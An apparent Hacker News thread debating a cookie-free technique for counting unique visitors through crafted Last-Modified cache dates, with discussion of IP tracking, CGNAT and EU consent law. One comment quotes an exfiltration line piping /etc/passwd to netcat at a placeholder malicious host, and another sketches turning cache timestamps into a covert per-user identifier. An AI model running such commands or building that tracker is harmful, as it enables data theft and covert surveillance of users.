Threads like this kinda make me sad about HN. Every single comment is about how this technique might possibly be abused to track users in very specific scenarios (i.e. you may be able to identify your most active user).
If a web server wanted to track you, they would just use your IP. This is a clever technical trick to count your number of users without collecting any personal data. I don't understand why that is such a bad thing?
> If a web server wanted to track you, they would just use your IP.
I'd think a HN user would know that using an IP to track isn't effective.
For most home desktop users, at best, it tracks an individual household, not a person. For corporate users and highly privacy-conscious home users, it's probably completely worthless as VPNs will make everyone come from a single IP.
For mobile users, it's completely worthless. You'd be tracking users of a specific WiFi network. If your phone is connecting via IPv4, then who knows who you're tracking, as phones on a mobile network will share an IP address.
And if you think VPN users are too obscure a use case to account for, a specific case I've dealt with is (1) all of AOL coming from one IP in Virginia (yes this was a while ago) and (2) almost every university appearing as a single IP (on a website frequented by university students)
At a previous job we tracked unique visitors to prevent ad fraud. You'd find not only individual IPs with thousands of users behind them, but also larger populations of users numbering in the tens of thousands behind a small block of 8-16 IPs.
The craziest was a large multinational corporation that (I guess for security?) changed their egress IP daily. The first three octets remained the same and the fourth was equal to the day of the month UTC. Really screws things up when you use a 14 day rolling window of previous traffic for comparisons.
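One way to cope with an egress address that rotates inside a single /24 like that is to key the rolling window on the network prefix rather than the full address. A minimal sketch, assuming IPv4 and assuming that a /24 is the right granularity (both are my assumptions, and `egress_key` is a made-up helper name):

```python
import ipaddress

def egress_key(ip: str, prefix_len: int = 24) -> str:
    """Collapse an IPv4 address to its enclosing network, e.g. a /24."""
    # strict=False lets us pass a host address and get the network it belongs to.
    return str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False))

# Day 1 and day 14 of the month map to the same key.
print(egress_key("203.0.113.1"), egress_key("203.0.113.14"))
```

The obvious cost is that unrelated visitors in the same /24 get merged too, so this only makes sense for blocks you already know belong to one organisation.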
Universities do that now? When I was in college, if you connected to the visitor network they'd give you an RFC 1918 address with NAT and a restrictive firewall, but if you connected to the regular network and authenticated as a student, they'd give you a publicly routable IP address.
Depends on a lot of factors. The primary school I was a student at had public IPs on every computer; our national academic and research network operators are encouraging local network operators to avoid private IPs. But the high school at which I'm currently a student has private IP addresses on every computer and a single external IPv4 for the entire facility. It's not so one sided.
Many will also push http/https proxies regardless of IP addressing schemes, so even if one user bypasses it, anyone using defaults will come from whatever the external proxy IP is.
I went to a community college that did transparent HTTP proxying with not just deep packet inspection but caching and "security"-oriented javascript injection. Headers would get reordered, and its parser wasn't perfect so multi-line headers would get broken sometimes. They'd inject JS into pages to scan for... something? Other injected JS? I have no idea. But it was impossible to directly connect to another server without going through their proxy even though from the TCP layer it looked like you were. Lots of difficult to debug issues.
Oh man, an old employer had one that did the same HTTP header monkeying. I discovered it because it broke, of all things, the C2 wiki. I thought the wiki was down when I sent a link to a coworker but then checked from my home machine (working remote but over Remote Desktop). And then, of course, had to figure out why it would work at home but not at work :D
I believe it was FortiGate but don’t quote me on that.
It also liked to drop idle TCP connections out of its routing table without sending a FIN or RST. HashiCorp Vault, at the time, only used TCP keep-alive and no additional in-band heartbeat mechanism. Naturally, the firewall dropped the idle connection earlier than the default keep-alive interval (which is long…). Additionally, packets sent to an IP-port combo that it didn’t have in its routing table were black holed, without an RST. We had this painful bug to chase where first thing every morning we could read but not write to Vault for a few minutes and then it would work fine for the rest of the day without incident.
I left tcpdump running overnight to see it. At night no one was using Vault… first thing in the morning, the first write goes out on the existing connection (still valid on both sides according to netstat) but just disappears into the ether. It takes a few minutes for the write to time out (while spamming retries), at which point Vault closed the connection and started a new one. I just about flipped the table over.
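For anyone chasing the same symptom, the usual workaround is to make the keep-alive probes fire before the middlebox forgets the connection. A minimal sketch, assuming Linux-style socket options (the default idle time there is 7200 seconds); the `enable_keepalive` name and the numbers are illustrative only, and this is not what Vault itself does:

```python
import socket

def enable_keepalive(sock: socket.socket, idle: int = 60,
                     interval: int = 10, probes: int = 5) -> None:
    """Turn on TCP keep-alive and, where supported, shorten its timers."""
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    # The three options below are not available on every platform,
    # so each one is only set when the constant exists.
    if hasattr(socket, "TCP_KEEPIDLE"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    if hasattr(socket, "TCP_KEEPINTVL"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, interval)
    if hasattr(socket, "TCP_KEEPCNT"):
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, probes)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
enable_keepalive(s)
s.close()
```

The idle value has to be shorter than whatever timeout the firewall uses, which you typically have to find out by experiment.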
Sadly that's well beyond my memory now. It was pretty formative for me though because I learned a lot of networking and programming and unix stuff so that I could write a TCP-over-HTTP tunnel to a home server just to bypass it. So all in all, great success to be honest.
Interesting. There's a Fortinet product as well in our school. I bet it's corruption and some sysadmin is somehow earning money, because it's so obviously unnecessary.
And it's set to block games. Ironically, I tried playing minecraft on a library computer and the server connection succeeded. Worst of all, lichess.org is blocked so students have to compete using their LTE network during chess tournaments.
It shows that we have a part private part state owned company employed as sysadmins in our school. They don't really understand the needs of the school.
Last time I worked on a project that cared/tracked this (~4 years back), all the prepaid cellular data users from one of the big 4 telcos here ended up on CGNAT and appeared to come from a small pool of 4 IP addresses.
Just use IPv6, and all mobile users will have unique addresses (although they might rotate, and IP tracking is generally not very reliable, as others mentioned).
Counting is not the same as tracking. The technique proposed would in most cases be useless for trying to distinguish individuals, much less identify them. It's the computer equivalent of the person standing out in front of Costco with a clicker counter.
In principle, screen resolution would in most cases be useless for trying to distinguish individuals. After all, it wouldn't even distinguish the underlying hardware, let alone a user of that hardware. But given omnipresent tracking, it's one more bit that can be used to identify you.
In addition, your comment shows a severe lack of imagination. Suppose I'm a malicious server who wishes to track users.
* For each new user, select a random "last-modified" date. Now, I can clearly distinguish between multiple different users, because "1985-01-01T00:00:10" is probably the 10th visit from whoever was given "1985-01-01T00:00:00" on their first visit.
* If I have too many users for the above approach to uniquely identify a person, add more cached items. With HTTP/2, both HTTP requests would use the same TCP connection, so I can correlate the requests together.
And, bam. That goes from "useless for trying to distinguish individuals, much less identify them" to a unique identifier stored in the cache invalidation dates.
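To make the concern concrete, here is a rough sketch of how a timestamp can carry both an identifier and a counter. The layout is my own assumption for illustration (one day per user "slot" counted from 1985-01-01, seconds within the day as the visit count); `encode` and `decode` are hypothetical names, not anything from the article:

```python
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1985, 1, 1, tzinfo=timezone.utc)

def encode(slot: int, visits: int) -> datetime:
    """Pack a per-user slot (days) and a visit count (seconds) into one date."""
    return EPOCH + timedelta(days=slot, seconds=visits)

def decode(stamp: datetime) -> tuple[int, int]:
    """Recover (slot, visits) from a date the browser echoes back."""
    delta = stamp - EPOCH
    return delta.days, delta.seconds

print(encode(0, 10).isoformat())   # the example date from the comment above
print(decode(encode(42, 10)))
```

This only works while the visit count stays below 86400, but the point stands: nothing in the header format stops the date from being an ID.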
That is a different technique that uses the same medium of storage. When I say "this technique" I'm referring to specifically what was discussed in the article.
"Evil tracking companies will do evil things with any protocol features you give them" is already well known and there's not much to say about it that hasn't been said. What OP is actually doing is clever and new to me.
I agree that it is clever, and it is new to me as well. However, saying that an obvious extension to a technique (posted by multiple people independently, no less) is a different technique altogether and therefore not germane is going a bit far.
If I post a privilege escalation exploit that allows me to execute "cat /etc/sudoers", and somebody points out that it could also be used to execute "cat /etc/passwd | netcat malicious-remote-server.com", that's an obvious extension of the same technique. This is the same, where the same technique may be used for more intrusive attacks than are performed in the initial proof of concept.
This kind of attack isn't new, though, trackers have been using side channel tracking forever now. A quick search shows that this exact side channel tracking vulnerability was discussed in the year 2000 [0].
I'm not saying the technique isn't similar: I just object to people dogpiling on OP because other people can and do abuse the same header in nefarious ways. It's not constructive, just a pointless attack on someone who's actually trying to improve privacy.
I wasn't attempting to dogpile, and am sorry if it came across that way. I agree that this scheme would, if used as a replacement for cookies in the manner described by the OP, be a strict improvement on the current state. That's the first step in evaluating a proposed privacy improvement.
However, that is only sufficient if you already trust the operator of the server to maintain that same implementation. That may work for some threat models, such as a website that is currently run by a trusted individual that may later be bought by a malicious actor, but it isn't sufficient in all cases. Across the entire ecosystem, there's a sequence of questions that needs to be asked.
1. How would a non-malicious actor implement the proposed system?
2. What is the minimal amount of information that must be provided for a non-malicious actor to benefit from the proposed system?
3. What could a malicious actor do with that minimal amount of information?
4. If a malicious actor could use this information, are there additional steps the user can take to mitigate those effects?
Together, these questions help to predict the effects of the proposed implementation becoming the standard. Applying it to this article:
1. As described in the original post.
2. The browser must cache files according to the cache policy requested, and the browser provides accurate information about its cache for subsequent requests.
3. Answered in previous comments, that malicious actors could use this to reproduce the same information as is stored in cookies.
4. I'm not sure yet, but I'm picturing an approach where the "if-modified-since" header is deliberately varied for some requests, and abnormal results cause the caching policy of that website to be ignored as untrustworthy.
When people try to figure out what malicious acts could be done, it's moving the conversation from the first two questions and toward the last two questions. It isn't malicious, or reading into the original poster's intentions, but is an attempt to predict what malicious actions will eventually occur, and to implement mitigations as soon as possible.
Of course this technique could be abused by a bad actor. That's true of literally everything in computing. Do you think we should ban encryption because bad people might encrypt stuff?
TFA describes a way to provide basic analytics in a way that completely respects the user's privacy. That's a good thing.
Counting is not tracking, but counting unique visitors requires tracking to know they are unique. If the person outside of Costco is counting unique visitors, they must be tracking who has already visited and who has not. Even if they aren't doing anything else with that information and forgetting it each night, it is tracking. The existing abuse of tracking has led to a level of backlash where any tracking is seen through the worst possible lens.
It doesn't require tracking. Tracking would mean I could tell that user x has returned n times. But I have no idea who has returned, only that someone has returned n times.
The person standing outside Costco is counting people by giving them a colored sticker when they walk through the door. If they show up already having one, the counter issues a different color. Who has the stickers is unknown; only the number of stickers distributed in each color is known.
As has been said, this is not to say the technique couldn't be used for nefarious purposes. In this case, it's not, though.
That's still a form of tracking. Maybe not enough to identify unique users in some use cases, but even just knowing someone has been here n times is enough if the user numbers are low enough that you can identify users by unique n counts and patterns of n. For example, suppose one user is at 500 and another is at 490, the second one is logging in daily while the first one hasn't logged in for a few months, and you see the 490 go 491, 492... When they go from 499 to 500, chances are that the 500 who logs on tomorrow and becomes 501 is the former 490 account that has been logging in daily.
Must admit, I've never thought of "number of times I've visited your site" as PII. Number of times I've visited every site in my browser history, maybe, but not "number of times I've visited this specific site". I'm thinking about it, but I'm not immediately convinced.
That's because you're forgetting the temporal domain. As in GP's example, a count alone may not mean much, but a time series of counts will allow you to uniquely identify a subset of the users.
Kinda need one for the other if you want to distinguish different users vs just one user clicking a lot.
You need some kind of identifier to differentiate between different sessions, and the moment you generate that ID, using whatever way, you are tracking the user.
No, you don't need an ID. The article has one implementation that avoids IDs, but here's a simpler one:
Place a cookie HAS_BEEN_ON_SITE=true as soon as someone loads any page.
Voila, your server can now distinguish between users who've been to your site and users who haven't, without being able to tell recurring users apart from each other.
The implementation in the article is fancier, because the cache control headers allow distinguishing this on a page-by-page basis, but it's the same general idea. Don't give the client an ID, just ask the client to tell you if it's been there before.
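A minimal sketch of the flag-cookie idea, assuming a plain dict as the tally and a hypothetical `handle_request` hook that receives the raw Cookie header; this is not the article's implementation:

```python
from http.cookies import SimpleCookie

def handle_request(cookie_header, tally):
    """Update the tally and return the Set-Cookie value to send, or None."""
    cookies = SimpleCookie()
    cookies.load(cookie_header or "")
    tally["visits"] += 1
    if "HAS_BEEN_ON_SITE" in cookies:
        return None  # returning visitor: nothing new to store
    tally["uniques"] += 1
    # Every client gets the same value, so the cookie cannot tell users apart.
    return "HAS_BEEN_ON_SITE=true; Path=/"

tally = {"visits": 0, "uniques": 0}
handle_request(None, tally)                      # first visit
handle_request("HAS_BEEN_ON_SITE=true", tally)   # same browser again
print(tally)
```

The server only ever learns "seen before: yes/no", which is the whole point.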
Yes, but whether you legally must get consent is a separate question from whether you can count unique visitors while still being unable to tell them apart from each other.
Back in my days we called those "tracking pixels" and it didn't even need a cookie.
That's just not a real problem to solve. If you don't want to track users, just giving each one a unique ID is not a problem if you don't store them for future lookup.
The fact remains that from the client's perspective, the client has no way of telling whether you track them or not, so you can't really prove to the user you're not tracking them.
Reminder that the GDPR does not care about cookies specifically but about personal data and tracking in general. Using the cache invalidation for tracking does not require any less consent than the equivalent cookie.
However, it does look like the ePrivacy Regulation will clear this specific case up, at least according to Wikipedia:
> The proposal also clarifies that no consent is needed for non-privacy-intrusive cookies improving internet experience (like to remember shopping cart history) or cookies used by a website to count the number of visitors.
It's not like that is a far walk though. It's the exact same technique, just storing different data.
Respectfully, I feel like this would be like seeing an example of CSS turning a page blue and claiming the technique is useless for turning the page red because that is not the specific example used.
If a bunch of people got up in arms and started complaining because the author of said CSS example hadn't considered that their code could be changed slightly to produce a hate symbol, I'd definitely still jump in and say "but that's not what they were doing!"
Depends how you define relevant. Since actively trying to block stalky advertising behaviours I've had more interesting adverts (by “interesting” I mean new-to-me, not the “do you want another one of the thing you've already bought all you need of for a while” types). Things are relevant enough if, for instance, I get running related adverts while reading an article about other runners or browsing shoes.
In my experience the stalky behaviour doesn't improve the advertising relevance from my PoV, so the fact it means that all that derived information, some of it definitely PII, is out there so should anyone be able to hack into it they could use it for fraudulent purposes (identity theft, spear-phishing my contacts, …), makes the situation lose-lose for me.
It is worse for other people, as they have information that advertisers like to derive that might be extra sensitive. Being white, male, cis, middle-class, etc., with a life not interesting enough for there to be much to convincingly blackmail or threaten me about, living in western Europe, I'm pretty safe, but this can't be said for others especially in certain parts of the world (scarily religious ruled countries with bad records on individual rights, like Qatar and America to give two examples).
I think you're conflating two different kinds of surveillance. The article is incrementing a counter to track the number of unique visitors.
If one is worried about blackmail or violence, especially from a government, then one should take precautions beyond complaining about the prevalence of browser cookies. Modern life, carrying a mobile internet device with GPS service, using a credit card, and going to places with security cameras, presents a variety of surveillance methods.
I was replying to the, well, the comment I replied to, rather than the counter method that started the thread. That post was anecdata about not minding being tracked, mine was anecdata regarding why I prefer we would not be.
> especially from a government
Were I to live in a regime like I mentioned above, I'd be as worried about vigilantism as about government action.
> presents a variety of surveillance methods.
Fair point, but I see a difference between choosing to take a risk and companies trying to follow me around whether I want them to or not. Maybe it is my monkey brain that grew up noticeably before such tech was ubiquitous, said brain having been taught that being followed was at best a bit creepy!
I used to follow the "I should keep everything private!" mantra that so many software engineers keep. Then I took a gig in advertising and realized how much information companies have despite my privacy efforts and learned to "love the bomb" so to speak.
To fight the problems posed by ubiquitous corporate and government surveillance, I suggest ubiquitous public surveillance. Like streamers do, but everywhere, all the time, publicly broadcasted. If I get disappeared, at least it'll be televised.
> vigilantism
There's a difference between being embedded in a supportive community, afraid of violence from outsiders, and being embedded in an antagonistic society, afraid of violence from insiders. In the former, ubiquitous public surveillance might help. In the latter, I think there is nothing to do but emigrate.
I don't want any unsolicited advertising - and I wish our societies would decide to outright ban advertising: Outdoor advertising is a nuisance for the eyes, radio and TV advertising is annoying AF (particularly as it tends to be mixed at a much greater loudness than the program running, my conspiracy theory is that this is done so people are forced to hear it when they go to the loo), paper advertising (e.g. in newspapers, flyers or postal spam) is a waste of paper and online advertising is an insane danger for privacy and a vector for distribution of malware.
Ideally, we'd have independent consumer protection entities, either government or private (e.g. German Stiftung Warentest), that would get products from companies to rank and test, so consumers could make actually informed decisions instead of being lured by hyped up advertising claims.
At the margin, it's very hard to tell the difference between advertisements and other media. Today I listened to an enjoyable podcast with 5 speakers, 2 of whom are employed by the same company. During the episode, they discussed a product that those 2 worked on. Was this an advertisement?
I think any ban like that would have a "I know it when I see it" standard, which isn't wonderful.
Storing a cookie with a counter still requires consent afaik. If I am right, then this technique is not sufficiently different and also requires consent.
Consent is always required; even if you just give people a random UUID, with no associated session/etc., that always requires consent.
There is a separate question, of whether consent is implied. If the identifying information is required to provide the user with a service they requested (e.g. a cookie for their online shopping cart), then consent is implied; no need to ask.
I don’t think this would require consent. It is not, as described in the post, uniquely identifying. It is not even pseudonymous. Thus, it is not personal data and does not require consent.
Without viable alternatives, sites will continue to use Google Analytics. If people like you fear-monger every alternative, sites will continue to use Google Analytics.
The method described in the article collects no personal data, collects no identifiable data, and is objectively more user-respecting than Google Analytics. But the behavior by people like you will help make sure that these alternatives don't gain traction and Google maintains their monopoly.
Not only that. The ability to track your own visitors is BUILT INTO how the web operates.
All a site has to do is include analytics in its server-side library. And that’s it. Doesn’t even need CNAME cloaking. It can send the analytics anywhere.
The thing ITP and others try to stop is tracking users ACROSS sites.
But if you use single-sign-on with FB or any other service, they can get your public photo and name, and just find you on Facebook through some search engine that spidered all profiles.
So if you really want to be anonymous, stop using the single sign on and reusing passwords etc.
Has Apple’s ITP closed this particular loophole by ignoring ETags in third-party iframes, capping them to 7 days, etc.?
It seems browsers will want to restrict ALL first party cookies to 7 days unless the visitor explicitly allows some domain to store their identity.
Frankly speaking, identity can be done better without cookies. Look at Web3 sign-ins, we need something built into the browser and seamless. For now maybe an extension. Then browser makers can have a privacy mode that retires cookies, entirely.
But how are you supposed to do caching without storing and sending identifying data equivalent to cookies?
My understanding is that most commenters are less critical of this specific implementation, but are alarmed by how this new technique could be used by other more nefarious parties in the future.
Counting visits is probably still not a fully GDPR-compliant use case, as the server stores data on the client's machine which is indistinguishable from a cookie containing a counter.
IANAL, but I spent a lot of time talking to them about GDPR.
First, this data does not and could not be used, if implemented as described in the post, to uniquely identify someone. As such, it is not personal data and not in scope of GDPR.
I'm pretty sure the police will also have bigger fish to fry than someone who nicks your wallet. But somehow I doubt you'd see that as a good argument for why that behavior should be accepted.
First, an IP address is considered personal data in the EU.
Second, an IP address is not enough, it may change or be shared. The advertisers ‘need’ to track you forever to serve you relevant ads. So they devise all kinds of tricks to do so.
> First, an IP address is considered personal data in the EU.
I don’t believe that’s true. To my knowledge, GDPR only treats an IP address as personal data if it is associated with actual identifying information (like name or address). Collecting IP addresses alone, and not associating them with anything else, is completely fine; otherwise nginx and Apache's default configs would violate GDPR, and through them basically every website would violate GDPR.
That's correct. IP addresses are not personal data in themselves but they may become so if further data are collected or accessible which allow to identify individuals when used together with IP addresses.
CGNAT complicates matters even further. Sometimes I'm placed way off within <country> if a site tries to go by GeoIP databases, as the provider placed a bunch of households behind a single address.
After decades of straight-up abuse by this sector of the industry, including the subversion of countless "privacy respecting" data collection techniques, I think an extraordinary amount of skepticism and suspicion is more than understandable.
Why would you put privacy respecting in quotes? The subversion of those techniques is probably just because those techniques are so new and people haven't had better technologies yet.
I personally consider those privacy respecting data collection techniques as a parallel with the development and use of cryptography on the web. In the beginning pretty much no one online used cryptography; later on we started using them but used weak ones ("export" cipher suites for example, or just look at the issues in early protocols like SSL 2.0 or SSL 3.0); nowadays almost everyone uses strong cryptography. Similarly, in the beginning pretty much no one cared about privacy when they did data collection; then we had begun to care more about privacy, but many schemes are easily broken due to for example misguided ideas of anonymization ("anonymization by hashing"), and we are also starting to see the development of newer private information retrieval schemes and differential privacy, etc. Unlike the cynics on this HN thread, I am quite confident that maybe a decade down the road the majority of data collection done by companies will be in a privacy preserving manner. Of course there will be outliers much like there are still websites that don't use https but those will be few and far between.
I quoted the term not with the intention of disparaging the notion, but to indicate that I'm referring to a specific class of approaches. That said, the term has also been abused to the point where when it's used, I immediately doubt that it's accurate.
It's not a clever technical trick. It's a pointless technical trick.
You can do exactly the same thing with cookies and they are better for privacy because there's an opt out mechanism. They're how you're supposed to do this sort of thing.
Using a trick like this is no different to cookies in the eyes of the GDPR. So the only reason to use this trick is if you don't want to respect your users' privacy by being able to block cookies.
This is significantly different from cookies from a GDPR perspective. This is not uniquely identifying. There is no way for the site to know if you are this user who has visited 100 times or that user who has visited 100 times.
There are at least three fallacies with stuff like GDPR that trigger anxiety in people by convincing them that they can somehow safeguard their own privacy while surfing hundreds of websites per day, many in other countries. I'm not going to fully discredit them, just give counterexamples:
1) The internet can continue to work without tracking users
- Targeted advertising (can't have both, although I can't say that I'll miss ads)
2) Users care that companies have their personally identifiable information (PII)
- Users care how companies share and abuse their data for profit (they already know they're being tracked if they don't use something like TorBrowser)
So I view all of this security theater with utter skepticism. I think the only thing that can maybe save us is transparency. Letting users download their data and using the threat of audit to keep internet companies honest:
The rest of the squabbling about "no that's PII, you can't save that!" has only resulted in endless nagging and distraction. It's like trying to hide your address from the post office or thinking that your phone number is secret because it's not in the phonebook.
Although I do think it's kind of funny to make big companies feel like they're living under a police state. They'll work tirelessly to undermine these protections, which is why we'll eventually abandon them like we did with prohibition and McCarthyism because they just aren't enforceable when everyone is breaking the law. Or (equally likely) they'll work to bolster these laws to create new markets through power imbalance, ensuring that only the largest companies can meet compliance and smaller companies pay some sort of protection money against the threat of litigation, which opens the door to mass corruption. Both of these scenarios are ugly enough that I think this entire rabbit hole is suspect.
I think this is probably illegal in EU countries. The ePrivacy Directive requires consent before storing data on a user's machine that isn't strictly necessary for providing the service the user requested. Analytics isn't "strictly necessary", and ePrivacy doesn't care whether you use the Cookie header or some other method of storage.
The directive is a bit hard to read, but it's widely understood to require at least notification before storing information on a user's device, probably consent. The guidance is a lot clearer: https://ec.europa.eu/justice/article-29/documentation/opinio...
Assuming you're correct, can anyone think of a way to count unique visitors without storing data on a user's machine or using identifiable user information? Identifiable user information should include hashes that can be re-computed given the original information.
This isn't a criticism of the law, I'm just curious what options there could be, because I can't think of any.
Ha, that would explain that question. My first reaction was mostly confusion as there is so much prior art at this point, i.e. fingerprinting through installed add-ons, resolution/window size/system language, browser language, IP locality etc. There are even demo pages around which show you just how unique your configuration is even without anything else.
The only reason we could think of for wanting unique visitors was for the marketing people or investors/stakeholders/shareholders. Parsing the request logs should be sufficient for every other metric.
We had a bunch of meetings about this at what essentially amounted to a giant information superhighway billboard company. IIRC someone brought up using cache headers even back then, because it didn't require cookies or javascript, which we couldn't guarantee would be "up to date", this is back in "target IE6, still" days.
As one of my networking friends said, advertisers usually know everything about your metrics, even if you don't. You can't really fudge the numbers in your favor, so raw requests or QPS or whatever ancillary metric would be enough.
The method in the article is defeated by clearing your session when you're done browsing, or by using an incognito/private browsing tab, as that should mark all "cached" items for deletion.
I thought GDPR cared mostly about uniquely identifying visitors which this does not do. You still need a cookie banner to state that you will put some data on their machine but you always need one of those.
That claim is false in Europe. You need to ask permission for this approach, because you're storing something on the user's device (the generated date in the cache) that isn't strictly necessary. The ePrivacy directive says you need permission for that. Nowhere does the law specify "cookies"; it's about any kind of data stored on the user's device.
True it does not matter if it’s a cookie, or whatever. You need to look to the ePrivacy directive article 5.3 for which exemption case applies. In the case of timestamps, it would be case A :
> when the cookie is used “for the sole purpose of carrying out the transmission of a communication over an electronic communications network” (“Exemption A“)
Since the timestamp is no longer used solely for this purpose, you need consent.
Cabin doesn't store a row in a database for each visit. It only stores one row, per day per domain. The attributes for that row are simple tally counts - visits, uniques, bounces etc. So no identifier is stored, and the hits go into the tally. We do not store the fact that a user has visited x amount of times. The demo here is to show how the technique works.
Cabin used to detect only the presence of any last-modified date to determine if the visit is unique or not. But extending it to distinguish hits 1,2 and 3 (by adding 1 second to the start of the day) now allows us to count the bounce rates too.
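For readers following along, the counting scheme described above could be sketched roughly like this. It is a minimal illustration and not Cabin's actual code: the function name `next_last_modified` and the handling of stale or malformed headers are assumptions.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple


def next_last_modified(if_modified_since: Optional[str], now: datetime) -> Tuple[str, int]:
    """Return (Last-Modified value to send, hit number for today).

    Hypothetical helper: the first hit of the day gets midnight UTC,
    and every further hit gets one more second added.
    """
    midnight = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0
    )
    hit = 1  # no usable header means this is the first hit today
    if if_modified_since:
        try:
            seen = parsedate_to_datetime(if_modified_since)
        except (TypeError, ValueError):
            seen = None  # malformed header: treat as a first hit
        if seen is not None:
            if seen.tzinfo is None:
                seen = seen.replace(tzinfo=timezone.utc)
            offset = (seen - midnight).total_seconds()
            # Only timestamps from today count; older ones start over.
            if 0 <= offset < 86400:
                hit = int(offset) + 2
    stamp = midnight + timedelta(seconds=hit - 1)
    return format_datetime(stamp, usegmt=True), hit
```

With this shape, a hit number of 1 increments the "uniques" tally and a hit number of 2 marks a visitor as no longer a bounce; nothing per-visitor needs to be stored server-side.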
Your landing page says "no cookies or consent banners" and "compliant with all privacy laws", but the timestamp approach stores data on a user's computer in a way that is not "strictly necessary in order to provide an information society service explicitly requested by the subscriber or user". Could you explain how you see your approach as compliant with the ePrivacy directive?
So the moral of the story is to use passive fingerprinting that is able to identify and track individual users, because then you can skip the cookie banner and be compliant with the law?
I think I would rather use this and rely on the courts to interpret it fairly if it ever came to that, which it won't.
I personally don't have an issue with it, but one thing that might set some of the people here at ease is if you stopped incrementing the timestamp after the second visit.
This would give you three possible states anyone could be in: never visited, visited once, and visited more than once. It's less data, but still enough to give you your bounce rate and your total visits while minimizing the number of boxes you're sorting individual visitors into.
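A rough sketch of that capped variant, assuming the server only ever sees the second-offset carried by the incoming header (`None` when there is no header). The names `next_offset` and `bounce_rate` are made up for illustration.

```python
from typing import List, Optional

MAX_OFFSET = 1  # 0 = visited once, 1 = visited more than once


def next_offset(previous: Optional[int]) -> int:
    """Offset (in seconds past midnight) to send back, capped at MAX_OFFSET."""
    if previous is None:
        return 0  # never visited before today
    return min(previous + 1, MAX_OFFSET)


def bounce_rate(incoming_offsets: List[Optional[int]]) -> float:
    """Share of today's visitors who never came back for a second hit."""
    uniques = sum(1 for o in incoming_offsets if o is None)
    # A request carrying offset 0 is a visitor making their second hit;
    # each visitor sends it at most once, because the reply moves them to 1.
    returned = sum(1 for o in incoming_offsets if o == 0)
    return (uniques - returned) / uniques if uniques else 0.0
```

Total visits are still just the number of requests, so the cap costs nothing for the three metrics mentioned.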
How do you distinguish two users with the same date stamp, to know they are two diff visitors?
User A: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User A: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:00 GMT
User B: last-modified: Wed, 30 Nov 2022 00:00:01 GMT
Next you see:
User ?: last-modified: Wed, 30 Nov 2022 00:00:02 GMT
Which user is it?
And have you had 2 count of visits, or 3 count? How do you know?
Finally, these aren't really counting visitors, but views, of this URL, by this browser, right?
There's a conventional taxonomy of terms for web stats, something like:
- users (as in MAU)
- visitors or uniques (typically daily uniques)
- visits or sessions (multiple views from one visitor in a cluster)
- views or pageviews (.html pages)
- hits or requests (every object gotten from server: .html, .js, .jpg, etc.)
Looks like your GIST is causing a remote user agent to store a count of its own views.
// I haven't tried it, just a quick skim of the blog and the gist, raising this question. I'm probably missing something.
How I'm interpreting their explanations is that they don't (can't) tell which user it is. They just know you've had two two-time visitors, and one one-time visitor.
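Under that reading, the server side is just a tally keyed by hit number. A small sketch, assuming each request is reduced to the second-offset in its incoming header (`None` for no header); the function names are hypothetical.

```python
from collections import Counter
from typing import Dict, Iterable, Optional


def tally(incoming_offsets: Iterable[Optional[int]]) -> Counter:
    """Count requests per hit number; no per-visitor key exists anywhere."""
    hits: Counter = Counter()
    for offset in incoming_offsets:
        hit_number = 1 if offset is None else offset + 2
        hits[hit_number] += 1
    return hits


def visitors_by_depth(hits: Counter) -> Dict[int, int]:
    """How many visitors stopped at exactly n hits (so far today)."""
    depth = {}
    for n in sorted(hits):
        stopped_here = hits[n] - hits[n + 1]
        if stopped_here > 0:
            depth[n] = stopped_here
    return depth
```

Feeding in the five requests from the question (A and B each arrive with no header and then with 00:00:00, then someone arrives with 00:00:01) gives two uniques and five views, with one visitor at two hits and one at three. Which of A or B made the third hit is not recoverable from the tally.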
Have lawyers familiar with EU law vetted your technique? Could you share their legal reasoning? If not, why would anyone ever take the risk to use your product and face huge fines?
I am all for privacy, use uBO, Firefox Focus / Incognito and Google alternatives. But if I have to consult a lawyer each time I write some code or write up a blog post, I'll take up gardening instead.
How about just consulting a lawyer each time you abuse a protocol to get user's software to behave in a way that is invisible to them and benefits you?
There is already a correct way to tell a browser to tell the server something with each subsequent request: Cookies. Nobody needs to "write some code" here; it's already written. Working around the protocol isn't engineering, it's just lying.
This blog post is just another cynical degradation of trust between users and their browsers, and browsers and the servers they talk to. Just another part of HTTP that we can't use for what it was designed for anymore because servers want so desperately to track visitors uniquely and a significant subset of visitors would prefer not to be remembered uniquely.
It doesn't track visitors. It just counts how many came back and how many bounced. It's very privacy friendly, but still doesn't meet your standards? I think you just like to complain.
This is simple. Why not use cookies? Because people don’t like cookies, or people delete cookies, or there are regulations surrounding cookies. So we’re doing what cookies are for with a different part of the protocol to circumvent all those issues.
Though, of course, it doesn’t circumvent any of them. Nobody who firmly rejects cookies is amused, and no court that ever made a cookie-consent law will shrug its shoulders and say “technically it’s not a cookie so I guess they’re in the clear”.
It’s ridiculous to call this privacy friendly, and I think you just like to track your users without asking.
Instead of putting a real, appropriate value in "last-modified", we're putting an arbitrary value, totally unrelated to actual response caching that the user's browser will unwittingly use next time it calls us and in so doing remind us of something about them. Maybe all it reminds us of is visit count, because we have restraint and that's all we're exploiting this for (for now). So now, for the third time:
Why not use a cookie?
The problem with this is encoded in the answer to that question. You're being willfully ignorant if you can't see that the answer to that question is: "Because I don't like certain governments, users, and user agents' way of handling cookies (e.g. deleting them, or requiring consent)".
So you agree it doesn't track users. At least we're on the same page there now.
Why not use a cookie? Because then they can't advertise that they don't use cookies. It's like how they put No-GMO label on food that doesn't even have GMO crop varieties. It's meaningless, but people are uneducated on the subject so it sells products.
You could use a cookie here, and you could do it completely legally without requiring consent. The laws don't care about cookies or other technical implementations, they care about tracking. So the reason to use this cache header instead of cookies is simply because people are uninformed on the subject and it sells better this way.
> Why not use a cookie? Because then they can't advertise that they don't use cookies.
Oh, so they can be craven motherfuckers who abuse protocols for the sake of web analytics. With you so far.
